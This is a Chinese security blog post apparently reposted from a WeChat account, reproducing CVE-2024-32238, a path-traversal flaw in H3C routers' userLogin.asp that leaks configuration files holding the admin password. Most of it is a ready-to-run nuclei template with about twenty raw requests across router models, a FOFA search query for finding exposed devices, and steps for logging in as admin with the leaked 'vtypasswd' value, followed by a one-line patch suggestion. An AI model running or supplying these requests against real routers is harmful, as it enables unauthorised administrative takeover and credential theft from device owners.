H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

admin
admin
admin
138775
文章
114
评论
2024年8月1日11:49:32评论280 views字数 5806阅读19分21秒阅读模式
免责声明:本文内容仅供技术学习参考,请勿用于违法破坏。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,与作者无关。如有侵权请联系删除

漏洞描述:

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)。攻击者可以利用该漏洞,获取路由器的管理员账号密码,这可能导致攻击者通过WEB管理界面进一步提权利用。

01

Nuclei POC

id: H3C-route-userlogin_asp-passwd-leakinfo:  name: H3C路由器userLogin.asp信息泄漏漏洞(CVE-2024-32238)  author: kingkong  severity: high  metadata:    fofa-query: app="H3C-Ent-Router"http:  - raw:      - |        GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../M60.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../GR8300.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../GR5200.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../GR3200.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../GR2200.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER6300G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER5200.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER5100.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3260G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3260.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3200G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3200.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3108GW.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3108G.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3100G2.cfgHTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER3100.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0      - |        GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0    matchers-condition: OR    matchers:      - type: dsl        dsl:              - 'contains(body_1,"vtypasswd")'              - 'contains(body_2,"vtypasswd")'              - 'contains(body_3,"vtypasswd")'              - 'contains(body_4,"vtypasswd")'              - 'contains(body_5,"vtypasswd")'              - 'contains(body_6,"vtypasswd")'              - 'contains(body_7,"vtypasswd")'              - 'contains(body_8,"vtypasswd")'              - 'contains(body_9,"vtypasswd")'              - 'contains(body_10,"vtypasswd")'              - 'contains(body_11,"vtypasswd")'              - 'contains(body_12,"vtypasswd")'              - 'contains(body_13,"vtypasswd")'              - 'contains(body_14,"vtypasswd")'              - 'contains(body_15,"vtypasswd")'              - 'contains(body_16,"vtypasswd")'              - 'contains(body_17,"vtypasswd")'              - 'contains(body_18,"vtypasswd")'              - 'contains(body_19,"vtypasswd")'              - 'contains(body_20,"vtypasswd")'              - 'contains(body_21,"vtypasswd")'

02

搜索语法

FOFA:app="H3C-Ent-Router"

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

界面如下

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

03

漏洞复现

账号密码登录错误的话,改为账号是admin,密码在vtypasswd参数后。

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

漏洞检测POC

GET /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg HTTP/1.1Host:User-Agent#替换访问路径/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/userLogin.asp/../actionpolicy_status/../M60.cfg/userLogin.asp/../actionpolicy_status/../GR8300.cfg/userLogin.asp/../actionpolicy_status/../GR5200.cfg/userLogin.asp/../actionpolicy_status/../GR3200.cfg/userLogin.asp/../actionpolicy_status/../GR2200.cfg/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg/userLogin.asp/../actionpolicy_status/../ER5200.cfg/userLogin.asp/../actionpolicy_status/../ER5100.cfg/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg/userLogin.asp/../actionpolicy_status/../ER3260.cfg/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg/userLogin.asp/../actionpolicy_status/../ER3200.cfg/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg/userLogin.asp/../actionpolicy_status/../ER3108G.cfg/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg/userLogin.asp/../actionpolicy_status/../ER3100.cfg/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

neclei批量检测截图

H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

04

修复建议

更新当前系统补丁:

https://www.h3c.com/cn/

原文始发于微信公众号(脚本小子):H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月1日11:49:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   H3C路由器userLogin.asp存在密码信息泄漏漏洞(CVE-2024-32238)【漏洞复现|附nuclei-POC】http://cn-sec.com/archives/2990322.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息